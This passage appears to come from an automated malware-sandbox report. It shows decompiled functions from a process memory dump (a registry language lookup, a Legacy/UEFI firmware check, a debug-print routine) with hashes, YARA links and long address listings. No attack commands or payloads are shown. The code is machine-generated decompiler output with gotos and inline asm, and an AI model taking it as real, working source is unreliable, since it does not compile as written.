                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A0E68C
                                                                                                                          • @, xrefs: 00A0E6C0
                                                                                                                          • InstallLanguageFallback, xrefs: 00A0E6DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                          • API String ID: 0-1757540487
                                                                                                                          • Opcode ID: ff8ffa5232129548df754c0fa4c335f8d70bc4437ce086249a9221d7d92d58c8
                                                                                                                          • Instruction ID: bf185e43313f99fb950a41b8fe95bb2fb6ec7e40fbf73a579b309ef612949cd9
                                                                                                                          • Opcode Fuzzy Hash: ff8ffa5232129548df754c0fa4c335f8d70bc4437ce086249a9221d7d92d58c8
                                                                                                                          • Instruction Fuzzy Hash: 8251CDB69087459BC714DF28D444AABB3F9AF88714F04096EF985E7280FB30DD44C7A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00ACE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00ACE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00ACBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00ACBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00ACAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00A49730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00ACA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00ACA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00A49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00ACA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00ACA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00A22280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00A1B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00A1FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00A27D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00ABFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                                          0x00ace547
                                                                                                                          0x00ace549
                                                                                                                          0x00ace54f
                                                                                                                          0x00ace553
                                                                                                                          0x00ace557
                                                                                                                          0x00ace55a
                                                                                                                          0x00ace55c
                                                                                                                          0x00ace55f
                                                                                                                          0x00ace561
                                                                                                                          0x00ace567
                                                                                                                          0x00ace56b
                                                                                                                          0x00ace7e2
                                                                                                                          0x00000000
                                                                                                                          0x00ace571
                                                                                                                          0x00ace575
                                                                                                                          0x00ace577
                                                                                                                          0x00ace57b
                                                                                                                          0x00ace57c
                                                                                                                          0x00ace57d
                                                                                                                          0x00ace57e
                                                                                                                          0x00ace57f
                                                                                                                          0x00ace588
                                                                                                                          0x00ace58f
                                                                                                                          0x00ace591
                                                                                                                          0x00ace592
                                                                                                                          0x00ace592
                                                                                                                          0x00ace596
                                                                                                                          0x00ace59e
                                                                                                                          0x00ace5a0
                                                                                                                          0x00ace5a6
                                                                                                                          0x00ace61d
                                                                                                                          0x00ace61d
                                                                                                                          0x00ace621
                                                                                                                          0x00ace623
                                                                                                                          0x00ace630
                                                                                                                          0x00ace630
                                                                                                                          0x00ace7e6
                                                                                                                          0x00ace7eb
                                                                                                                          0x00ace7ed
                                                                                                                          0x00ace7f4
                                                                                                                          0x00ace7fa
                                                                                                                          0x00ace7ff
                                                                                                                          0x00ace7ff
                                                                                                                          0x00ace80a
                                                                                                                          0x00ace812
                                                                                                                          0x00ace812
                                                                                                                          0x00ace5ab
                                                                                                                          0x00ace5b4
                                                                                                                          0x00ace5b9
                                                                                                                          0x00ace5be
                                                                                                                          0x00ace5c0
                                                                                                                          0x00ace5c2
                                                                                                                          0x00ace5c8
                                                                                                                          0x00ace5c9
                                                                                                                          0x00ace5cb
                                                                                                                          0x00ace5cc
                                                                                                                          0x00ace5d5
                                                                                                                          0x00ace5e4
                                                                                                                          0x00ace5f1
                                                                                                                          0x00ace5f8
                                                                                                                          0x00ace5f8
                                                                                                                          0x00ace5d5
                                                                                                                          0x00ace602
                                                                                                                          0x00ace616
                                                                                                                          0x00ace63d
                                                                                                                          0x00ace644
                                                                                                                          0x00ace64d
                                                                                                                          0x00ace652
                                                                                                                          0x00ace657
                                                                                                                          0x00ace659
                                                                                                                          0x00ace65b
                                                                                                                          0x00ace661
                                                                                                                          0x00ace662
                                                                                                                          0x00ace664
                                                                                                                          0x00ace665
                                                                                                                          0x00ace66e
                                                                                                                          0x00ace67d
                                                                                                                          0x00ace68a
                                                                                                                          0x00ace691
                                                                                                                          0x00ace691
                                                                                                                          0x00ace66e
                                                                                                                          0x00ace6b0
                                                                                                                          0x00000000
                                                                                                                          0x00ace6b6
                                                                                                                          0x00ace6bd
                                                                                                                          0x00ace6c7
                                                                                                                          0x00ace6d7
                                                                                                                          0x00ace6d9
                                                                                                                          0x00ace6db
                                                                                                                          0x00ace6de
                                                                                                                          0x00ace6e3
                                                                                                                          0x00ace6f3
                                                                                                                          0x00ace6fc
                                                                                                                          0x00ace700
                                                                                                                          0x00ace700
                                                                                                                          0x00ace704
                                                                                                                          0x00ace70a
                                                                                                                          0x00ace70a
                                                                                                                          0x00ace713
                                                                                                                          0x00ace716
                                                                                                                          0x00ace719
                                                                                                                          0x00ace720
                                                                                                                          0x00ace761
                                                                                                                          0x00ace76b
                                                                                                                          0x00ace774
                                                                                                                          0x00ace77a
                                                                                                                          0x00ace77a
                                                                                                                          0x00ace78a
                                                                                                                          0x00ace791
                                                                                                                          0x00ace799
                                                                                                                          0x00ace79b
                                                                                                                          0x00ace79f
                                                                                                                          0x00ace7aa
                                                                                                                          0x00ace7c0
                                                                                                                          0x00ace7ac
                                                                                                                          0x00ace7b2
                                                                                                                          0x00ace7b9
                                                                                                                          0x00ace7b9
                                                                                                                          0x00ace7c7
                                                                                                                          0x00ace806
                                                                                                                          0x00000000
                                                                                                                          0x00ace7c9
                                                                                                                          0x00ace7d1
                                                                                                                          0x00ace7d8
                                                                                                                          0x00000000
                                                                                                                          0x00ace7d8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ace722
                                                                                                                          0x00ace72e
                                                                                                                          0x00ace748
                                                                                                                          0x00ace74c
                                                                                                                          0x00ace754
                                                                                                                          0x00ace756
                                                                                                                          0x00ace75c
                                                                                                                          0x00ace75c
                                                                                                                          0x00000000
                                                                                                                          0x00ace75c
                                                                                                                          0x00ace758
                                                                                                                          0x00ace758
                                                                                                                          0x00000000
                                                                                                                          0x00ace758
                                                                                                                          0x00ace750
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ace752
                                                                                                                          0x00000000
                                                                                                                          0x00ace752
                                                                                                                          0x00ace730
                                                                                                                          0x00ace735
                                                                                                                          0x00ace73d
                                                                                                                          0x00ace73f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ace741
                                                                                                                          0x00ace741
                                                                                                                          0x00000000
                                                                                                                          0x00ace741
                                                                                                                          0x00ace739
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ace73b
                                                                                                                          0x00000000
                                                                                                                          0x00ace73b
                                                                                                                          0x00ace722
                                                                                                                          0x00ace720
                                                                                                                          0x00ace6b0
                                                                                                                          0x00ace618
                                                                                                                          0x00000000
                                                                                                                          0x00ace618

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `$`
                                                                                                                          • API String ID: 0-197956300
                                                                                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                          • Instruction ID: 7c626fc3c84bc9caa841d47183bd9377d63de84eb528687525193b1bf215b648
                                                                                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                          • Instruction Fuzzy Hash: 1D918C326043419FEB24CF29C941F2BB7E6AF84714F15892DF9A9CB281E774E904CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A851BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00A851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xae05f0);
				E00A5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00A1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00A853CA(0);
						return E00A5D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00A4F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00A23690(1, _t117, 0x9e1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00A4AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00A24620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00A4AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00A8500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00A49860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                          0x00a851be
                                                                                                                          0x00a851c3
                                                                                                                          0x00a851c8
                                                                                                                          0x00a851cd
                                                                                                                          0x00a851d0
                                                                                                                          0x00a851d3
                                                                                                                          0x00a851d8
                                                                                                                          0x00a851db
                                                                                                                          0x00a851de
                                                                                                                          0x00a851e0
                                                                                                                          0x00a851e3
                                                                                                                          0x00a851e6
                                                                                                                          0x00a851e8
                                                                                                                          0x00a85342
                                                                                                                          0x00a85351
                                                                                                                          0x00a85356
                                                                                                                          0x00a8535a
                                                                                                                          0x00a85360
                                                                                                                          0x00a85363
                                                                                                                          0x00a85366
                                                                                                                          0x00a85369
                                                                                                                          0x00a85369
                                                                                                                          0x00a8536b
                                                                                                                          0x00a8536b
                                                                                                                          0x00a85370
                                                                                                                          0x00a853a3
                                                                                                                          0x00a853a4
                                                                                                                          0x00a853a6
                                                                                                                          0x00a853ab
                                                                                                                          0x00a853ab
                                                                                                                          0x00a853ae
                                                                                                                          0x00a853ae
                                                                                                                          0x00a853b5
                                                                                                                          0x00a853bf
                                                                                                                          0x00a853bf
                                                                                                                          0x00a85375
                                                                                                                          0x00a85396
                                                                                                                          0x00a853a0
                                                                                                                          0x00a853a0
                                                                                                                          0x00000000
                                                                                                                          0x00a85396
                                                                                                                          0x00a85377
                                                                                                                          0x00a85379
                                                                                                                          0x00a8537f
                                                                                                                          0x00a8538c
                                                                                                                          0x00a85390
                                                                                                                          0x00000000
                                                                                                                          0x00a85390
                                                                                                                          0x00a851ee
                                                                                                                          0x00a851f1
                                                                                                                          0x00a85301
                                                                                                                          0x00a85310
                                                                                                                          0x00a85315
                                                                                                                          0x00a85318
                                                                                                                          0x00a8531b
                                                                                                                          0x00a85320
                                                                                                                          0x00a8532e
                                                                                                                          0x00a85331
                                                                                                                          0x00000000
                                                                                                                          0x00a85331
                                                                                                                          0x00a85328
                                                                                                                          0x00a85329
                                                                                                                          0x00000000
                                                                                                                          0x00a85329
                                                                                                                          0x00a851fa
                                                                                                                          0x00a85235
                                                                                                                          0x00a85236
                                                                                                                          0x00a85239
                                                                                                                          0x00a8523f
                                                                                                                          0x00a85240
                                                                                                                          0x00a85241
                                                                                                                          0x00a85242
                                                                                                                          0x00a85246
                                                                                                                          0x00a85247
                                                                                                                          0x00a8524e
                                                                                                                          0x00a85251
                                                                                                                          0x00a85267
                                                                                                                          0x00a85269
                                                                                                                          0x00a8526e
                                                                                                                          0x00a8527d
                                                                                                                          0x00a8527e
                                                                                                                          0x00a85281
                                                                                                                          0x00a85282
                                                                                                                          0x00a85287
                                                                                                                          0x00a85288
                                                                                                                          0x00a8528a
                                                                                                                          0x00a8528f
                                                                                                                          0x00a85294
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8529a
                                                                                                                          0x00a8529c
                                                                                                                          0x00a8529e
                                                                                                                          0x00a8529e
                                                                                                                          0x00a852a4
                                                                                                                          0x00a852b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a852ba
                                                                                                                          0x00a852bc
                                                                                                                          0x00a852bc
                                                                                                                          0x00a852d4
                                                                                                                          0x00a852d9
                                                                                                                          0x00a852dc
                                                                                                                          0x00a852e1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a852e7
                                                                                                                          0x00a852f4
                                                                                                                          0x00000000
                                                                                                                          0x00a852f4
                                                                                                                          0x00a85270
                                                                                                                          0x00000000
                                                                                                                          0x00a85270
                                                                                                                          0x00a851fc
                                                                                                                          0x00a851fd
                                                                                                                          0x00a85202
                                                                                                                          0x00a85203
                                                                                                                          0x00a85205
                                                                                                                          0x00a8520a
                                                                                                                          0x00a8520f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a8521b
                                                                                                                          0x00a85226
                                                                                                                          0x00a8522b
                                                                                                                          0x00a8521d
                                                                                                                          0x00a8521d
                                                                                                                          0x00a85222
                                                                                                                          0x00a85222
                                                                                                                          0x00a8522d
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                          • Opcode ID: 7777f42b753c2f183798a3d29467f3f0b98c909afc63df87ef7e42f27a4b7470
                                                                                                                          • Instruction ID: 9267e26fe72816ade9941b0ec12f769db27891fc8c548eeaa5d8847f7da24e89
                                                                                                                          • Opcode Fuzzy Hash: 7777f42b753c2f183798a3d29467f3f0b98c909afc63df87ef7e42f27a4b7470
                                                                                                                          • Instruction Fuzzy Hash: 4A516EB1E00A189FDB25EFA9C950AAEBBF8FF48740F14402DE949EB251DA71DD41CB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00A0B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xadf7a8);
				E00A5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00A5D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00A4D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00A4F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00A5DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00A4B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00A4B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00A4E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00A4A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                          0x00a0b171
                                                                                                                          0x00a0b171
                                                                                                                          0x00a0b171
                                                                                                                          0x00a0b171
                                                                                                                          0x00a0b171
                                                                                                                          0x00a0b176
                                                                                                                          0x00a0b17b
